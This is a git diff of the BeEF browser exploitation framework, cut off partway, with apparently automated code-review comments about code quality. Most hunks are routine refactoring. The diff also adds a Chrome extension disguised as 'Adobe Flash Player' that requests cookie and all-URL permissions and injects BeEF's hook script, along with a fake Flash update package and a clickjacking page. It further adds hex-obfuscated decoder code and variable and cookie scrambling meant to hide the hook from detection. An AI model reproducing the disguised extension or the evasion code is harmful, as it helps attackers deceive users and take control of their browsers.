diff --git a/README.mkd b/README.mkd index 4396db7cd..79df0d1af 100644 --- a/README.mkd +++ b/README.mkd @@ -72,13 +72,13 @@ __The following is for the impatient.__ For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. - $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef) + $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef) Usage ----- -To get started, simply execute beef and follow the instrustions: +To get started, simply execute beef and follow the instructions: - $ ./beef + $ ./beef diff --git a/beef b/beef index b99cc5672..6302be317 100755 --- a/beef +++ b/beef @@ -59,6 +59,15 @@ if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true BeEF::Core::Console::Banners.print_ascii_art end +# @note Check if port and WebSocket port need to be updated from command line parameters +unless BeEF::Core::Console::CommandLine.parse[:port].empty? + config.set('beef.http.port', BeEF::Core::Console::CommandLine.parse[:port]) +end + +unless BeEF::Core::Console::CommandLine.parse[:ws_port].empty? + config.set('beef.http.websocket.port', BeEF::Core::Console::CommandLine.parse[:ws_port]) +end + # @note Prints BeEF welcome message BeEF::Core::Console::Banners.print_welcome_msg @@ -115,7 +124,7 @@ print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}" #@note Starts the WebSocket server if config.get("beef.http.websocket.enable") BeEF::Core::Websocket::Websocket.instance - print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port")}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]" + print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]" end 
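Review bot: The value handed to `config.set('beef.http.port', ...)` in the beef @@ -59 hunk is the raw option string from the parser, so the port is an Integer when it comes from YAML and a String when it comes from `-p`; the `.to_i` added to the WebSocket log line in the @@ -115 hunk works around that symptom rather than the cause. Nothing rejects a non-numeric or out-of-range value either, so `-p abc` is accepted here and only fails when the listener binds. Coerce and validate once, at the parser: in the commandline.rb @@ -53 hunk use OptionParser's built-in type, `opts.on('-p', '--port PORT', Integer, 'Change the default BeEF listening port') do |p|` (same for `--wsport`), default both options to `nil` instead of `""` in the @@ -26 hunk, and test with `.nil?` here instead of `.empty?`. `BeEF::Core::Console::CommandLine.parse` is also called four more times in a row in this hunk; bind its result to a local once (the `@already_parsed` flag suggests it is memoised, but a local is clearer).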
diff --git a/core/filters/browser.rb b/core/filters/browser.rb index 0bf881883..f955fb6f6 100644 --- a/core/filters/browser.rb +++ b/core/filters/browser.rb @@ -78,10 +78,10 @@ module Filters true end - # Verify the screen params are valid + # Verify the screen size is valid # @param [String] str String for testing - # @return [Boolean] If the string has valid screen param characters - def self.is_valid_screen_params?(str) + # @return [Boolean] If the string has valid screen size characters + def self.is_valid_screen_size?(str) return false if has_non_printable_char?(str) return false if str.length > 200 true @@ -105,6 +105,15 @@ module Filters true end + # Verify the date stamp is valid + # @param [String] str String for testing + # @return [Boolean] If the string has valid date stamp characters + def self.is_valid_date_stamp?(str) + return false if has_non_printable_char?(str) + return false if str.length > 200 + true + end + # Verify the browser_plugins string is valid # @param [String] str String for testing # @return [Boolean] If the string has valid browser plugin characters diff --git a/core/main/client/browser.js b/core/main/client/browser.js index 53d6505e5..762072108 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js @@ -166,10 +166,18 @@ beef.browser = { /** * Returns true if FF12 -* @example: beef.browser.isFF12() + * @example: beef.browser.isFF12() */ isFF12: function() { -return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null; + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/12\./) != null; + }, + + /** + * Returns true if FF13 + * @example: beef.browser.isFF13() + */ + isFF13: function() { + return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/13\./) != null; }, /** 
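Review bot: `is_valid_date_stamp?` in the browser.rb @@ -105 hunk is a verbatim copy of `is_valid_screen_size?` (no non-printable characters, length ≤ 200) and does not check that the value looks like a date at all, so the name promises more than the method delivers. Either tighten the check to the format the client actually sends or name it for what it does; at minimum the shared body belongs in one helper, e.g. `def self.printable_and_bounded?(str, max_len = 200)` called by both predicates. The `is_` prefix on a `?` predicate is against the Ruby style guide, though it matches the rest of this file.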
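Review bot: `isFF13` in the browser.js @@ -166 hunk is a copy of `isFF12` with only the version number changed, and the commit then has to extend `isFF`, `type` and `getVersion` in the @@ -177, @@ -411 and @@ -468 hunks on the next line to teach them about it. A single parameterised check would remove the per-version edits: `isFFVersion: function(v) { return !!window.history.replaceState && window.navigator.userAgent.match(new RegExp('Firefox\\/' + v + '\\.')) != null; }`, with `isFF13: function() { return this.isFFVersion(13); }` kept only if callers depend on the name. The enclosing `beef.browser` object literal starts before the hunk.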
@@ -177,7 +185,7 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo * @example: beef.browser.isFF() */ isFF: function() { - return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12(); + return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13(); }, /** @@ -411,6 +419,7 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo FF10: this.isFF10(), // Firefox 10 FF11: this.isFF11(), // Firefox 11 FF12: this.isFF12(), // Firefox 12 + FF13: this.isFF13(), // Firefox 13 FF: this.isFF(), // Firefox any version IE6: this.isIE6(), // Internet Explorer 6 @@ -468,6 +477,7 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo if (this.isFF10()) { return '10' }; // Firefox 10 if (this.isFF11()) { return '11' }; // Firefox 11 if (this.isFF12()) { return '12' }; // Firefox 12 + if (this.isFF13()) { return '13' }; // Firefox 13 if (this.isIE6()) { return '6' }; // Internet Explorer 6 if (this.isIE7()) { return '7' }; // Internet Explorer 7 @@ -704,7 +714,7 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo /** * Returns zombie screen size and color depth. */ - getScreenParams: function() { + getScreenSize: function() { return { width: window.screen.width, height: window.screen.height, 
@@ -753,10 +763,11 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo var hostname = document.location.hostname; var hostport = (document.location.port)? document.location.port : "80"; var browser_plugins = beef.browser.getPlugins(); + var date_stamp = new Date().toString(); var os_name = beef.os.getName(); var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null; var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;}); - var screen_params = beef.browser.getScreenParams(); + var screen_size = beef.browser.getScreenSize(); var window_size = beef.browser.getWindowSize(); var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No"; var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No"; @@ -778,9 +789,10 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo if(hostport) details["HostPort"] = hostport; if(browser_plugins) details["BrowserPlugins"] = browser_plugins; if(os_name) details['OsName'] = os_name; + if(date_stamp) details['DateStamp'] = date_stamp; if(system_platform) details['SystemPlatform'] = system_platform; if(browser_type) details['BrowserType'] = browser_type; - if(screen_params) details['ScreenParams'] = screen_params; + if(screen_size) details['ScreenSize'] = screen_size; if(window_size) details['WindowSize'] = window_size; if(java_enabled) details['JavaEnabled'] = java_enabled; if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled diff --git a/core/main/client/browser/popup.js b/core/main/client/browser/popup.js index 656d41c6a..bdea5eb35 100644 --- a/core/main/client/browser/popup.js +++ b/core/main/client/browser/popup.js 
@@ -25,7 +25,7 @@ beef.browser.popup = { blocker_enbabled: function () { - screenParams = beef.browser.getScreenParams(); + screenParams = beef.browser.getScreenSize(); var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable'); if (popUp == null || typeof(popUp)=='undefined') { return true; @@ -36,4 +36,4 @@ beef.browser.popup = { } }; -beef.regCmp('beef.browser.popup'); \ No newline at end of file +beef.regCmp('beef.browser.popup'); diff --git a/core/main/client/mitb.js b/core/main/client/mitb.js index b51a781a4..626b36ce8 100644 --- a/core/main/client/mitb.js +++ b/core/main/client/mitb.js @@ -177,7 +177,7 @@ beef.mitb = { target.innerHTML = y.responseText; setTimeout(beef.mitb.hook, 10); } - } + }; y.send(query); beef.mitb.sniff("POST: " + url + "[" + query + "]"); return true; @@ -227,7 +227,7 @@ beef.mitb = { target.innerHTML = y.responseText; setTimeout(beef.mitb.hook, 10); } - } + }; y.send(null); beef.mitb.sniff("GET: " + url); diff --git a/core/main/console/commandline.rb b/core/main/console/commandline.rb index 340e79135..1ad2fa025 100644 --- a/core/main/console/commandline.rb +++ b/core/main/console/commandline.rb @@ -26,6 +26,9 @@ module BeEF @options[:resetdb] = false @options[:ascii_art] = false @options[:ext_config] = "" + @options[:port] = "" + @options[:ws_port] = "" + @already_parsed = false @@ -53,6 +56,14 @@ module BeEF opts.on('-c', '--config FILE', 'Load a different configuration file: if it\'s called custom-config.yaml, git automatically ignores it.') do |f| @options[:ext_config] = f end + + opts.on('-p', '--port PORT', 'Change the default BeEF listening port') do |p| + @options[:port] = p + end + + opts.on('-w', '--wsport WS_PORT', 'Change the default BeEF WebSocket listening port') do |ws_port| + @options[:ws_port] = ws_port + end end optparse.parse! 
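Review bot: `screenParams = beef.browser.getScreenSize();` in the popup.js @@ -25 hunk assigns without `var`, so the renamed call still creates an implicit global that leaks out of `blocker_enbabled` and throws under strict mode. Declare it locally: `var screenParams = beef.browser.getScreenSize();`. The function's closing lines are outside the hunk.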
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb index 862e20770..dfb3b8040 100644 --- a/core/main/handlers/browserdetails.rb +++ b/core/main/handlers/browserdetails.rb @@ -118,6 +118,14 @@ module BeEF self.err_msg "Invalid operating system name returned from the hook browser's initial connection." end + # get and store the date + date_stamp = get_param(@data['results'], 'DateStamp') + if BeEF::Filters.is_valid_date_stamp?(date_stamp) + BD.set(session_id, 'DateStamp', date_stamp) + else + self.err_msg "Invalid date returned from the hook browser's initial connection." + end + # get and store page title page_title = get_param(@data['results'], 'PageTitle') if BeEF::Filters.is_valid_pagetitle?(page_title) @@ -175,11 +183,11 @@ module BeEF end # get and store the zombie screen size and color depth - screen_params = get_param(@data['results'], 'ScreenParams') - if BeEF::Filters.is_valid_screen_params?(screen_params) - BD.set(session_id, 'ScreenParams', screen_params) + screen_size = get_param(@data['results'], 'ScreenSize') + if BeEF::Filters.is_valid_screen_size?(screen_size) + BD.set(session_id, 'ScreenSize', screen_size) else - self.err_msg "Invalid screen params returned from the hook browser's initial connection." + self.err_msg "Invalid screen size returned from the hook browser's initial connection." end # get and store the window size diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb index 2b8125c11..92473876d 100644 --- a/core/main/handlers/modules/beefjs.rb +++ b/core/main/handlers/modules/beefjs.rb @@ -77,7 +77,7 @@ module Modules if config.get("beef.extension.evasion.enable") evasion = BeEF::Extension::Evasion::Evasion.instance - @hook = evasion.obfuscate(@hook) + @hook = evasion.add_bootstrapper + evasion.obfuscate(@hook) end @body << @hook diff --git a/core/main/handlers/modules/command.rb b/core/main/handlers/modules/command.rb index 25c11865d..9d7646614 100644 
--- a/core/main/handlers/modules/command.rb +++ b/core/main/handlers/modules/command.rb 
@@ -50,26 +50,34 @@ module BeEF build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty? ws = BeEF::Core::Websocket::Websocket.instance + + if config.get("beef.extension.evasion.enable") + evasion = BeEF::Extension::Evasion::Evasion.instance + @output = evasion.obfuscate(command_module.output) + else + @output = command_module.output + end + #todo antisnatchor: remove this gsub crap adding some hook packing. if config.get("beef.http.websocket.enable") && ws.getsocket(hooked_browser.session) - content = command_module.output.gsub('// - // Copyright 2012 Wade Alcorn wade@bindshell.net - // - // Licensed under the Apache License, Version 2.0 (the "License"); - // you may not use this file except in compliance with the License. - // You may obtain a copy of the License at - // - // http://www.apache.org/licenses/LICENSE-2.0 - // - // Unless required by applicable law or agreed to in writing, software - // distributed under the License is distributed on an "AS IS" BASIS, - // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - // See the License for the specific language governing permissions and - // limitations under the License. - //', "") - ws.send(content, hooked_browser.session) + #content = command_module.output.gsub('// + #// Copyright 2012 Wade Alcorn wade@bindshell.net + #// + #// Licensed under the Apache License, Version 2.0 (the "License"); + #// you may not use this file except in compliance with the License. + #// You may obtain a copy of the License at + #// + #// http://www.apache.org/licenses/LICENSE-2.0 + #// + #// Unless required by applicable law or agreed to in writing, software + #// distributed under the License is distributed on an "AS IS" BASIS, + #// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + #// See the License for the specific language governing permissions and + #// limitations under the License. 
+ #//', "") + ws.send(@output, hooked_browser.session) else - @body << command_module.output + "\n\n" + @body << @output + "\n\n" end # @note prints the event to the console if BeEF::Settings.console? diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb index 17d757e29..b30573a0d 100644 --- a/extensions/admin_ui/controllers/modules/modules.rb +++ b/extensions/admin_ui/controllers/modules/modules.rb @@ -119,21 +119,36 @@ class Modules < BeEF::Extension::AdminUI::HttpController summary_grid_hash['results'].push(page_name_row) # add the row end + # set and add the return values for the date stamp + date_stamp = BD.get(zombie_session, 'DateStamp') + if not date_stamp.nil? + encoded_date_stamp = CGI.escapeHTML(date_stamp) + encoded_date_stamp_hash = { 'Date' => encoded_date_stamp } + + page_name_row = { + 'category' => 'Host', + 'data' => encoded_date_stamp_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end + # set and add the return values for the os name os_name = BD.get(zombie_session, 'OsName') if not host_name.nil? encoded_os_name = CGI.escapeHTML(os_name) encoded_os_name_hash = { 'OS Name' => encoded_os_name } - + page_name_row = { 'category' => 'Host', 'data' => encoded_os_name_hash, 'from' => 'Initialization' } - + summary_grid_hash['results'].push(page_name_row) # add the row end - + # set and add the return values for the browser name browser_name = BD.get(zombie_session, 'BrowserName') if not browser_name.nil? 
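Review bot: The old licence-stripping `gsub` in command.rb is kept as a fifteen-line commented-out block rather than deleted; it is unreachable now that `@output` is sent, and git history preserves it, so the whole `#content = ... #//', "")` run should go. `@output` only feeds `ws.send` and `@body <<` a few lines later, so unless another method of this handler reads it (not visible here) a local is the better fit: `output = config.get("beef.extension.evasion.enable") ? BeEF::Extension::Evasion::Evasion.instance.obfuscate(command_module.output) : command_module.output`. The enclosing method starts before the hunk.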
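Review bot: The new date-stamp block in the modules.rb @@ -119 hunk is another copy of the same get/escape/wrap/push sequence, differing only in the BD key and the label; a helper such as `add_host_row(summary_grid_hash, 'Date', date_stamp)` would keep each field to one line and make the slips this pattern invites easier to see (the unchanged `os_name` block just below still tests `host_name.nil?` instead of `os_name.nil?`). Also prefer `unless date_stamp.nil?` over `if not date_stamp.nil?`. The enclosing method continues beyond the hunk.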
@@ -224,24 +239,24 @@ class Modules < BeEF::Extension::AdminUI::HttpController end # set and add the zombie screen size and color depth - screen_params = BD.get(zombie_session, 'ScreenParams') - if not screen_params.nil? + screen_size = BD.get(zombie_session, 'ScreenSize') + if not screen_size.nil? - screen_params_hash = JSON.parse(screen_params.gsub(/\"\=\>/, '":')) # tidy up the string for JSON - width = screen_params_hash['width'] + screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON + width = screen_size_hash['width'] (print_error "width is wrong type";return) if not width.is_a?(Fixnum) - height = screen_params_hash['height'] + height = screen_size_hash['height'] (print_error "height is wrong type";return) if not height.is_a?(Fixnum) - colordepth = screen_params_hash['colordepth'] + colordepth = screen_size_hash['colordepth'] (print_error "colordepth is wrong type";return) if not colordepth.is_a?(Fixnum) # construct the string to be displayed in the details tab - encoded_screen_params = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s) - encoded_screen_params_hash = { 'Screen Params' => encoded_screen_params } + encoded_screen_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s) + encoded_screen_size_hash = { 'Screen Size' => encoded_screen_size } page_name_row = { 'category' => 'Host', - 'data' => encoded_screen_params_hash, + 'data' => encoded_screen_size_hash, 'from' => 'Initialization' } diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb index 927686cb7..a896184cb 100644 --- a/extensions/console/lib/shellinterface.rb +++ b/extensions/console/lib/shellinterface.rb 
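Review bot: `JSON.parse(screen_size.gsub(/\"\=\>/, '":'))` in the modules.rb @@ -224 hunk runs on a value that came from the hooked browser and was only checked for printable characters and length (`is_valid_screen_size?`), so a malformed `ScreenSize` raises `JSON::ParserError` out of the admin UI controller instead of taking the `print_error`/`return` path the type checks below provide. Wrap the parse: `begin; screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')); rescue JSON::ParserError; print_error "ScreenSize is not valid JSON"; return; end`. The shellinterface.rb @@ -433 hunk two lines down has the same unguarded parse and no type checks at all, so the same guard belongs there. The enclosing method continues beyond the hunk.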
@@ -328,21 +328,36 @@ class ShellInterface summary_grid_hash['results'].push(page_name_row) # add the row end + # set and add the return values for the date + date_stamp = BD.get(self.targetsession, 'DateStamp') + if not date_stamp.nil? + encoded_date_stamp = CGI.escapeHTML(date_stamp) + encoded_date_stamp_hash = { 'Date' => encoded_date_stamp } + + page_name_row = { + 'category' => 'Host', + 'data' => encoded_date_stamp, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end + # set and add the return values for the os name os_name = BD.get(self.targetsession, 'OsName') if not os_name.nil? encoded_os_name = CGI.escapeHTML(os_name) encoded_os_name_hash = { 'OS Name' => encoded_os_name } - + page_name_row = { 'category' => 'Host', 'data' => encoded_os_name_hash, 'from' => 'Initialization' } - + summary_grid_hash['results'].push(page_name_row) # add the row end - + # set and add the return values for the browser name browser_name = BD.get(self.targetsession, 'BrowserName') if not browser_name.nil? 
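Review bot: The date row in the shellinterface.rb @@ -328 hunk passes `'data' => encoded_date_stamp` (a String) whereas every other row in this method, and the matching block in modules.rb, passes the wrapped hash, and `encoded_date_stamp_hash` is built and then never used. Change it to `'data' => encoded_date_stamp_hash,` so the console renders the row like the others. The method continues beyond the hunk.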
@@ -433,21 +448,21 @@ class ShellInterface end # set and add the zombie screen size and color depth - screen_params = BD.get(self.targetsession, 'ScreenParams') - if not screen_params.nil? + screen_size = BD.get(self.targetsession, 'ScreenSize') + if not screen_size.nil? - screen_params_hash = JSON.parse(screen_params.gsub(/\"\=\>/, '":')) # tidy up the string for JSON - width = screen_params_hash['width'] - height = screen_params_hash['height'] - colordepth = screen_params_hash['colordepth'] + screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON + width = screen_size_hash['width'] + height = screen_size_hash['height'] + colordepth = screen_size_hash['colordepth'] # construct the string to be displayed in the details tab - encoded_screen_params = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s) - encoded_screen_params_hash = { 'Screen Params' => encoded_screen_params } + encoded_screen_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s) + encoded_screen_size_hash = { 'Screen Size' => encoded_screen_size } page_name_row = { 'category' => 'Host', - 'data' => encoded_screen_params_hash, + 'data' => encoded_screen_size_hash, 'from' => 'Initialization' } diff --git a/extensions/demos/flash_update_chrome_extension/background.js b/extensions/demos/flash_update_chrome_extension/background.js new file mode 100644 index 000000000..e20376b0e --- /dev/null +++ b/extensions/demos/flash_update_chrome_extension/background.js @@ -0,0 +1,4 @@ +d=document; +e=d.createElement('script'); +e.src="http://127.0.0.1:3000/hook.js"; +d.body.appendChild(e); diff --git a/extensions/demos/flash_update_chrome_extension/icon128.png b/extensions/demos/flash_update_chrome_extension/icon128.png new file mode 100644 index 000000000..58a6ecc85 Binary files /dev/null and b/extensions/demos/flash_update_chrome_extension/icon128.png differ 
diff --git a/extensions/demos/flash_update_chrome_extension/icon16.png b/extensions/demos/flash_update_chrome_extension/icon16.png new file mode 100644 index 000000000..855e228e8 Binary files /dev/null and b/extensions/demos/flash_update_chrome_extension/icon16.png differ diff --git a/extensions/demos/flash_update_chrome_extension/icon48.png b/extensions/demos/flash_update_chrome_extension/icon48.png new file mode 100644 index 000000000..2f4cd2b7c Binary files /dev/null and b/extensions/demos/flash_update_chrome_extension/icon48.png differ diff --git a/extensions/demos/flash_update_chrome_extension/manifest.json b/extensions/demos/flash_update_chrome_extension/manifest.json new file mode 100644 index 000000000..7e2c4fa44 --- /dev/null +++ b/extensions/demos/flash_update_chrome_extension/manifest.json @@ -0,0 +1,26 @@ +{ + // Simple chrome extension + // Just loads beef into the extension context. + // + // You may need to set the IP address of the beef hook in background.js + // Then you can pack the extension (from within the chrome extensions page) and add the crx file to extensions/demos/html/ + + "name": "Adobe Flash Player", + "version": "11.2.202.235", + "description": "Introduces vulnerabilites into web browsers", + "background": { + "scripts": ["background.js"] + }, + "icons": { + "16": "icon16.png", + "48": "icon48.png", + "128": "icon128.png" + }, + "permissions": [ + "tabs", + "http://*/*", + "https://*/*", + "file://*/*", + "cookies" + ] +} diff --git a/extensions/demos/html/adobe_flash_update.crx b/extensions/demos/html/adobe_flash_update.crx new file mode 100644 index 000000000..91a0af8c8 Binary files /dev/null and b/extensions/demos/html/adobe_flash_update.crx differ diff --git a/extensions/demos/html/adobe_flash_update.png b/extensions/demos/html/adobe_flash_update.png new file mode 100644 index 000000000..9f0278e6b Binary files /dev/null and b/extensions/demos/html/adobe_flash_update.png differ 
diff --git a/extensions/demos/html/clickjack.html b/extensions/demos/html/clickjack.html new file mode 100644 index 000000000..486fe35b0 --- /dev/null +++ b/extensions/demos/html/clickjack.html @@ -0,0 +1,4 @@ +

 

+moooooooo +

 

+ diff --git a/extensions/evasion/config.yaml b/extensions/evasion/config.yaml index d8603a43d..b708a9ecb 100644 --- a/extensions/evasion/config.yaml +++ b/extensions/evasion/config.yaml @@ -20,5 +20,9 @@ beef: name: 'Evasion' authors: ["antisnatchor"] scramble_variables: true - to_scramble: ["beef", "Beef"] + scramble_cookies: true + scramble: + beef: "beef" + Beef: "Beef" + evercookie: "evercookie" chain: ["scramble","minify","base_64"] \ No newline at end of file diff --git a/extensions/evasion/evasion.rb b/extensions/evasion/evasion.rb index 1ce45b1e7..b86cca957 100644 --- a/extensions/evasion/evasion.rb +++ b/extensions/evasion/evasion.rb @@ -29,6 +29,26 @@ module BeEF @input = apply_chain(input, @@techniques) end + def add_bootstrapper + @bootstrap = '' + # add stuff at the end, only once (when serving the initial init javascript) + @@techniques.each do |technique| + #1. get the ruby module inside the obfuscation directory: the file name will be the same of the string used in "chain" + #2. call the "execute" method of the ruby module, passing the input + #3. update the input in order that next technique will work on the pre-processed input. + if File.exists?("#{$root_dir}/extensions/evasion/obfuscation/#{technique}.rb") + print_debug "[OBFUSCATION] Applying technique [#{technique}]" + klass = BeEF::Extension::Evasion.const_get(technique.capitalize).instance + is_bootstrap_needed = klass.need_bootstrap + if is_bootstrap_needed + @bootstrap += klass.get_bootstrap + end + end + @bootstrap + end + @bootstrap + end + def apply_chain(input, techniques) @output = input techniques.each do |technique| 
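Review bot: The three numbered comments inside `add_bootstrapper` (evasion.rb @@ -29) are copied from `apply_chain` and describe calling `execute` and updating the input, which this method never does; it only concatenates `get_bootstrap` from techniques whose `need_bootstrap` is true, so the comments and the `"Applying technique"` debug message mislead. Replace them with a short YARD header, e.g. `# @return [String] bootstrap code of every configured technique that reports need_bootstrap, in chain order`, and a debug line that says it is collecting rather than applying. The bare `@bootstrap` as the last expression of the `each` block is a no-op and should go, and the accumulator has no reason to be an instance variable. The hunk ends in the middle of `apply_chain`.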
@@ -37,8 +57,7 @@ module BeEF #3. update the input in order that next technique will work on the pre-processed input. if File.exists?("#{$root_dir}/extensions/evasion/obfuscation/#{technique}.rb") print_debug "[OBFUSCATION] Applying technique [#{technique}]" - klass = BeEF::Extension::Evasion.const_get(technique.capitalize) - klass = klass.instance + klass = BeEF::Extension::Evasion.const_get(technique.capitalize).instance @output = klass.execute(@output, @@config) end @output diff --git a/extensions/evasion/extension.rb b/extensions/evasion/extension.rb index dc81f5200..ce1fc360e 100644 --- a/extensions/evasion/extension.rb +++ b/extensions/evasion/extension.rb @@ -26,6 +26,7 @@ end end require 'extensions/evasion/evasion' +require 'extensions/evasion/helper' require 'extensions/evasion/obfuscation/scramble' require 'extensions/evasion/obfuscation/minify' require 'extensions/evasion/obfuscation/base_64' diff --git a/extensions/evasion/helper.rb b/extensions/evasion/helper.rb new file mode 100644 index 000000000..68eb9c3b0 --- /dev/null +++ b/extensions/evasion/helper.rb 
@@ -0,0 +1,33 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +module BeEF + module Extension + module Evasion + # Common methods used by multiple obfuscation techniques + module Helper + + def self.random_string(length=5) + chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ' + result = '' + length.times { result << chars[rand(chars.size)] } + result + end + + end + end + end +end + diff --git a/extensions/evasion/obfuscation/base_64.rb b/extensions/evasion/obfuscation/base_64.rb index 27c8e960a..cf8a55309 100644 --- a/extensions/evasion/obfuscation/base_64.rb +++ b/extensions/evasion/obfuscation/base_64.rb 
@@ -19,19 +19,20 @@ module BeEF class Base_64 include Singleton - def random_string(length=5) - chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ' - result = '' - length.times { result << chars[rand(chars.size)] } - result + def need_bootstrap + true + end + + def get_bootstrap + # the decode function is obfuscated, and it's called "dec" (see below in "execute", where it is used) + decode_function = 'var _0x33db=["\x61\x74\x6F\x62","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68","\x6A\x6F\x69\x6E"];function dec(_0x487fx2){if(window[_0x33db[0]]){return atob(_0x487fx2);} ;var _0x487fx3=_0x33db[1];var _0x487fx4,_0x487fx5,_0x487fx6,_0x487fx7,_0x487fx8,_0x487fx9,_0x487fxa,_0x487fxb,_0x487fxc=0,_0x487fxd=0,dec=_0x33db[2],_0x487fxe=[];if(!_0x487fx2){return _0x487fx2;} ;_0x487fx2+=_0x33db[2];do{_0x487fx7=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fx8=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fx9=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fxa=_0x487fx3[_0x33db[4]](_0x487fx2[_0x33db[3]](_0x487fxc++));_0x487fxb=_0x487fx7<<18|_0x487fx8<<12|_0x487fx9<<6|_0x487fxa;_0x487fx4=_0x487fxb>>16&0xff;_0x487fx5=_0x487fxb>>8&0xff;_0x487fx6=_0x487fxb&0xff;if(_0x487fx9==64){_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4);} else {if(_0x487fxa==64){_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4,_0x487fx5);} else {_0x487fxe[_0x487fxd++]=String[_0x33db[5]](_0x487fx4,_0x487fx5,_0x487fx6);} ;} ;} while(_0x487fxc<_0x487fx2[_0x33db[6]]);;dec=_0x487fxe[_0x33db[7]](_0x33db[2]);return dec;};' end def execute(input, config) encoded = Base64.strict_encode64(input) # basically, 
